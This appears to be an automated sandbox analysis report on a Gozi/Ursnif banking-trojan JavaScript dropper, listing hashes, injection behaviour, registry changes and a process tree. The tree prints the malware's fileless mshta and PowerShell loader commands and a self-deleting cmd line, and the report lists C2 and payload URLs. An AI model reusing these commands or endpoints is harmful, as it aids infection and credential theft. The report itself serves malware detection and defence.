gozi_ifsb | 6d779d0b5bede913b065d80a8bd84e2797b07ee6e9acf2edc419b9d0a471a761

General

Target

open_presentation_g8l.js
Size

1.4MB
MD5

58da4d0d9bdde0fcecd9d244ced71cc5
SHA1

15122a24648096af45215fa4bfa55f36a432088b
SHA256

e8d7ff11016b3a8f8b3c3e07b3895ff9e9d286aaf45bcc41907b701d7af1bd85
SHA512

346233e19159d7228d1905b645d4b7d6682230f3cccdce04284f1433d2d935c57c6d332364b65334edc374de0aab2c7451dde1448e7c59fc026a0e0b0567230f

Score

10^/10

banker trojan gozi_ifsb ursnif spyware

Malware Config

Signatures

Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

3388 regsvr32.exe
Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

iexplore.exe

pid process

4088 iexplore.exe
4088 iexplore.exe
4088 iexplore.exe

pid	process
3388	regsvr32.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE
Token: SeShutdownPrivilege	2992	Explorer.EXE
Token: SeCreatePagefilePrivilege	2992	Explorer.EXE

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3892 set thread context of 2992	3892	powershell.exe	Explorer.EXE
PID 2992 set thread context of 3432	2992	Explorer.EXE	RuntimeBroker.exe
PID 2992 set thread context of 4088	2992	Explorer.EXE	iexplore.exe
PID 2992 set thread context of 1656	2992	Explorer.EXE	cmd.exe
PID 1656 set thread context of 2128	1656	cmd.exe	PING.EXE
PID 2992 set thread context of 3972	2992	Explorer.EXE	WinMail.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

2992 Explorer.EXE
Ursnif, Dreambot
Ursnif is a variant of the Gozi IFSB with more capabilities.
banker trojan ursnif
Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

3892 powershell.exe
2992 Explorer.EXE
2992 Explorer.EXE
2992 Explorer.EXE
1656 cmd.exe
2992 Explorer.EXE
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2128 PING.EXE

pid	process
2992	Explorer.EXE

pid	process
2128	PING.EXE

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

wscript.exeregsvr32.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4076 wrote to memory of 1460	4076	wscript.exe	regsvr32.exe
PID 4076 wrote to memory of 1460	4076	wscript.exe	regsvr32.exe
PID 1460 wrote to memory of 3388	1460	regsvr32.exe	regsvr32.exe
PID 1460 wrote to memory of 3388	1460	regsvr32.exe	regsvr32.exe
PID 1460 wrote to memory of 3388	1460	regsvr32.exe	regsvr32.exe
PID 4088 wrote to memory of 2560	4088	iexplore.exe	IEXPLORE.EXE
PID 4088 wrote to memory of 2560	4088	iexplore.exe	IEXPLORE.EXE
PID 4088 wrote to memory of 2560	4088	iexplore.exe	IEXPLORE.EXE
PID 4088 wrote to memory of 3608	4088	iexplore.exe	IEXPLORE.EXE
PID 4088 wrote to memory of 3608	4088	iexplore.exe	IEXPLORE.EXE
PID 4088 wrote to memory of 3608	4088	iexplore.exe	IEXPLORE.EXE
PID 3840 wrote to memory of 3892	3840	mshta.exe	powershell.exe
PID 3840 wrote to memory of 3892	3840	mshta.exe	powershell.exe
PID 3892 wrote to memory of 916	3892	powershell.exe	csc.exe
PID 3892 wrote to memory of 916	3892	powershell.exe	csc.exe
PID 916 wrote to memory of 736	916	csc.exe	cvtres.exe
PID 916 wrote to memory of 736	916	csc.exe	cvtres.exe
PID 3892 wrote to memory of 1100	3892	powershell.exe	csc.exe
PID 3892 wrote to memory of 1100	3892	powershell.exe	csc.exe
PID 1100 wrote to memory of 1192	1100	csc.exe	cvtres.exe
PID 1100 wrote to memory of 1192	1100	csc.exe	cvtres.exe
PID 3892 wrote to memory of 2992	3892	powershell.exe	Explorer.EXE
PID 3892 wrote to memory of 2992	3892	powershell.exe	Explorer.EXE
PID 3892 wrote to memory of 2992	3892	powershell.exe	Explorer.EXE
PID 2992 wrote to memory of 3432	2992	Explorer.EXE	RuntimeBroker.exe
PID 2992 wrote to memory of 1656	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 1656	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 1656	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 3432	2992	Explorer.EXE	RuntimeBroker.exe
PID 2992 wrote to memory of 3432	2992	Explorer.EXE	RuntimeBroker.exe
PID 2992 wrote to memory of 4088	2992	Explorer.EXE	iexplore.exe
PID 2992 wrote to memory of 4088	2992	Explorer.EXE	iexplore.exe
PID 2992 wrote to memory of 1656	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 4088	2992	Explorer.EXE	iexplore.exe
PID 2992 wrote to memory of 1656	2992	Explorer.EXE	cmd.exe
PID 1656 wrote to memory of 2128	1656	cmd.exe	PING.EXE
PID 2992 wrote to memory of 2880	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 2880	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 2884	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 2884	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 2572	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 2572	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 3384	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 3384	2992	Explorer.EXE	cmd.exe
PID 2992 wrote to memory of 3972	2992	Explorer.EXE	WinMail.exe
PID 2992 wrote to memory of 3972	2992	Explorer.EXE	WinMail.exe
PID 2992 wrote to memory of 3972	2992	Explorer.EXE	WinMail.exe
PID 2992 wrote to memory of 3972	2992	Explorer.EXE	WinMail.exe
PID 2992 wrote to memory of 3972	2992	Explorer.EXE	WinMail.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

pid	process
4088	iexplore.exe
4088	iexplore.exe
2560	IEXPLORE.EXE
2560	IEXPLORE.EXE
4088	iexplore.exe
4088	iexplore.exe
3608	IEXPLORE.EXE
3608	IEXPLORE.EXE
4088	iexplore.exe
4088	iexplore.exe
2560	IEXPLORE.EXE
2560	IEXPLORE.EXE

Suspicious behavior: EnumeratesProcesses 1276 IoCs

Processes:

powershell.exeExplorer.EXE

pid	process
3892	powershell.exe
3892	powershell.exe
3892	powershell.exe
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE
2992	Explorer.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2128 PING.EXE

pid	process
2128	PING.EXE

Makes http(s) request 17 IoCs

Contacts server via http/https, possibly for C2 communication.

Processes:

description	flow	ioc
HTTP URL	6	http://f1.pipen.at/api1/n3ELRoeHggAX4ljfa1U/Y9xmcvjIlb_2B1E9fQxP0V/uGECCnTUCixQT/wXu_2BBy/Mb1BMibXP0gYiSUCSV30u_2/FmG_2FIkn8/Sggo1C8GbDJeStYue/i9nMVQO68apQ/PvVuEMlH9yX/E0eyuTfKQOil3y/P3685dPXoBx8ogIwlk0sa/GZ_2BbYguSODwL6b/q_2BOyyl7jyZShB/OpsHI5Br9KA97TZbE5/3qVZciCD8/G0qh92Wcmg5WF_2BcIcr/VPorH7OLcwvYcYAXxh_/0A_0DyYP9loyhrLCeGw1Nl/pUAmgHtJGTra2/Y2CiOqu0/iXTazGgNcPbQrOWmLBeoukU/ozd9K7N
HTTP URL	30	http://vv.malorun.at/api1/gsIFbnHDjWptRCt14THOa/7IM3eEvGuicuP_2F/ptxhx8OAfCTs9d1/bDBzfMhtQZA3zS2puj/H4uQsbOUF/9zRDJDM94Ri1V4g_2BAk/oVQ73ySe8vRf8timVah/JAGIXlZriSNL9qdxpVQSTX/AwtKBqn5AzNCi/tPhbHARv/EfzIcyad0KdMyASIe3hZrMk/L43eIjn54n/rcD_2FIye6eXthIjS/CaTNUa6Wc1Gz/PuRmiv3yxep/ey1x1nQGjCodLV/txsz9b20_2BG_0A_0DsTw/w3077j9t8KthXfm6/1Rnak_2FcNjmkF3/_2Bc9kJdckel/nxscL
HTTP URL	17	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3b5020c1614a016e
HTTP URL	15	https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlist.xml
HTTP URL	40	http://vv.malorun.at/api1/JmQxJpaDEKp/QghqaCG5HukK4H/R5mmrv2Yz2uDpAuDwiQuX/SZjI6WRTGLfg_2BL/6i5SGANUYcMcLQH/DTrS3letK7g6Nl5qK5/U9IlxI9J5/pAnrfEVljh_2BVCNx3Oi/Wb9IDRqpK5drgG99bAu/OMs0eDCjSzvKghIrEhwg9Z/d2t_2Bryp8bGQ/X5W3Ffkh/_2FgFRZcdqYYaadtXirCxjz/SM0TuEWzM5/2n_2FrkPj3yGoccip/faditCnXGE_2/BsV0rGSrgBc/KBGQ9_0A_0DPwT/wa9PpkiwgjhczhnFwJtJU/7xP5JPzcupXXL/nVTpg52tm/V
HTTP URL	19	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
HTTP URL	5	http://f1.pipen.at/api1/XhBe1OxoZX_2F4qQlrh6dl2/qMHIxOxOhp/OADtuoWLRKasm5xv4/yngP05Z448am/nxr3Lq90_2F/cEo7qcaAXq8Ybg/CkMEYl1ozVJU9bTaD_2F6/K_2B_2F4ExJHZkJq/EF85VORcnPwEkLU/yIvRD5bMrsIXxePseU/XClVvjnkH/uz7hRsr094LK01jWCyHy/WXZDIMSaf_2F532z5LV/IxKofMh6R8uAbmk8S5HFyp/8szR5Lf4GGbBX/IM4Tu7bv/uso319VoKxFzd1pV_0A_0Dd/u2e5WEOurJ/bj5KpQMl_2FBc4KFm/613kbltOM/5RMT_2BgNZiPf/x
HTTP URL	7	http://f1.pipen.at/favicon.ico
HTTP URL	8	http://f1.pipen.at/favicon.ico
HTTP URL	12	http://api10.dianer.at/jvassets/xI/t64.dat
HTTP URL	29	http://vv.malorun.at/api1/7Sp1caDL_2B/fNwkbVZqkZGl4I/Bg_2FTJOC3BqsuW3tV1CG/Xr54nl3EBbxlt7E8/N_2BH60M4QS1jRT/mpWN_2FN3FRBRsLMrY/y82tVRFuR/54_2FIUuu0N8JftlOOKZ/a3EN_2BNJmiOMpkxqIA/U82cay0g8GPht6wEfhc80i/rein0Mfy0PPuS/0R0PT_2F/tGopwItd_2Fvqcbp5aCcgiV/MWzcHYa2NM/FrjZWv0Mkpm20n2Y0/UqcdrqTWqJFN/rF4G3K5iSx6/Zq0_2FN5qm_2B_/0A_0DAT3bdv4KMzDoHM_2/BtW64Z07nLFbf8Fp/Vo17xOmU/tbOxn_2B/ELn
HTTP URL	9	http://f1.pipen.at/api1/jWkY4ggt5KRIJE_2F/ODQvT3vH2sGc/rdAie5fs4SR/7YIYqgx7O85K88/cyN6EFFADkoX2LEx1u45_/2FyT3KkmnoJ_2Boj/HR20_2FSIB9a9qY/OqRn56pP6BIAkSd_2F/KZFlTdgix/P_2F5b7cC3u0QCfeqenh/_2FgPSd_2Fkjo0W5KjE/MtM1Pm9_2BB_2Ba_2FkvdM/Wh2umWHANrTmQ/3fyn6Zaj/GJeBbTbbeuP9qAb99jdjJyV/ntg5jDW097/FPN3ajRt_2B6j2tED/TM5RXX4LqYw_/0A_0D2_2BTE/DIPfELWbMha9OK/JY2x2NL5VQj1v6wVI3wRY/2EMuNjoGSxP3mEYM/zFlH2_2BYXp3i/Qg
HTTP URL	32	http://vv.malorun.at/api1/GhhPVRgs_/2FrKtkbLyaiFSB41JTLo/2aGBLXu1csx5gC01Y7n/vjnwnlJuFwGkB_2BKXgCnN/5QHyxSwG06aiX/2DdPAmaR/W2d9cJDVvq4oO4BUPfKji62/IykJBRpTat/0xR_2F8SlW8NguVs_/2FS6eB8vIFJZ/63Ny4Eu2wo9/o3fyaR3cQcDBFu/VxydKq76RCPaHm7uUhm2Y/UAdZTU0YoEsO6BW5/8NIhCoeYs4PbkZh/Xbr6I_2Bqnjmgip9GK/kuLBCSPzZ/URBH2_0A_0DgdZUB_2FK/Q5LFNiZPAMkTtIDpAaK/uA0NJd89NtLfQ9xr_2FnTQ/ThDMkWLeRqzmhsWsLug/XQr
HTTP URL	20	https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlist.xml
HTTP URL	42	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?0d2940c2517f5b87
HTTP URL	31	http://vv.malorun.at/api1/jr0JChurldamSz/HWKw_2BOf1wZ_2BBiqh0u/b4lB3L8WZskCL4Xr/i2iJMzN5MkK0xZx/bypHuWqmuarf2YbY4v/g_2FFLVDV/oX8tgWhF3BlFqsFtNA2G/fYDxBnZmxfaBnSvZWtt/sXbFDFTMYxauZZcgzWIVFA/EWAISkEPycx2g/EdQGR_2B/DWhEDLOoZXmNwPCWFWc1ur9/_2BCCDJxif/r8lO1MsIMDOzle7C2/M1accvoCfEK1/cNSr0lTgVhM/tXq4A3LGnO9GbZ/_0A_0D2KJMfwqnxaioHvC/qWNZGNyZuYUsPSXi/skZnzZgwAtXLGhB/3
HTTP URL	36	http://vv.malorun.at/api1/K81J0ImdWo5ZOv6ZgBWkHuY/GlGZhAc10U/FPjNOI2vKxIwc66dZ/h3C0x6XODcjz/_2BIj93uOba/R_2Fmw7_2FpvKo/pQKNcsGBg6cc8diAMgSWz/1DEwYZ1K8eU5U4Tf/IpNBU_2B5xGLiuG/UpW_2BNuNsqW1fPz4r/TXURopl1w/I5HMgR53BgAPSOPbKVuK/nJvtEHLjVyfWbw8BbPC/B_2BEbPVtBF65NHGGcksRJ/Fv77zANTlbSR8/Pguw73sR/g_2BGI45R8qQli0Pi5_0A_0/DJPPtZv1Yu/XmxEh0Pm9eLnHMsBX/4B_2BLk4_2BD/IXzSJgp2zhF/jH

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 3 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE

Modifies Internet Explorer settings 1 TTPs 35 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30807260"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30807260"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 803c3da6dc14d601	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3004506518"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006277417e0e384844bb6ae3857779503200000000020000000000106600000001000020000000b95c91b2b6859a6477894d612fde28d8609ba85bdf28b5824364bfc4440dba2b000000000e80000000020000200000008e083cdea518a26b508086b24d0885af04d85118ba67ec103ba7f65375834439200000009cb9059fd582918171e907e3f051bc3c922feea47ce80b2a77a1a50195b964c24000000055868745c60ec936bc057a444f02e4a1c1faa9aa0f93484983471116543647f3ab39f41b9c4701ee2e7c473905d05a9f448c0d54776f7db2f49a4b1c9f8377ed	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3024508036"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30807260"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 207630a7dc14d601	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3004662713"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{DE4E9EC2-80CF-11EA-8133-5E6BBC652EA4} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006277417e0e384844bb6ae3857779503200000000020000000000106600000001000020000000dc8edf589b2e7359b601e85993beb9e349b3dc3258b80f5fbae08b3eb2c94baf000000000e80000000020000200000007e6a110714aaadab20b3fc6f8b3482a7a967e35bac540d3da25b28ed86792f9b200000003689bcdc271a059d8bbda6f274b5700d97a122ac8c4d16275b1b4a7c14dd947940000000b559cb0b8a0de44755bf8439e87086f3e973e0b7ae8b2630279d8df9467cff897b503cf5a371a6a00a6d0a387160f1ee3e9fd8944f789ec14d630bfca4146306	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:2992
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\open_presentation_g8l.js
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4076
- - C:\Windows\System32\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\\lymCsi.txt
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1460
  - - C:\Windows\SysWOW64\regsvr32.exe
      C:\Users\Admin\AppData\Local\Temp\\lymCsi.txt
      4⤵
      Loads dropped DLL
      PID:3388
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\786D016B-7752-6A8D-C12C-9B3E8520FF52\\Apdsprov'));if(!window.flag)close()</script>"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3840
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\786D016B-7752-6A8D-C12C-9B3E8520FF52").Assioker))
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    PID:3892
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zkftt52b\zkftt52b.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:916
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C4A.tmp" "c:\Users\Admin\AppData\Local\Temp\zkftt52b\CSCCFD34CEAE7D04CB28360BF13C6421431.TMP"
        5⤵
        
        PID:736
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lxdlcmcs\lxdlcmcs.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1100
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E1F.tmp" "c:\Users\Admin\AppData\Local\Temp\lxdlcmcs\CSCE12C0745587E40819B1C7B675FC5D35F.TMP"
        5⤵
        
        PID:1192
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\lymCsi.txt"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Runs ping.exe
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2128
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\65A4.bi1"
  2⤵
  PID:2880
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:3196
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\6540.bi1"
  2⤵
  PID:2884
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:3708
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6540.bi1"
  2⤵
  PID:2572
- C:\Windows\system32\cmd.exe
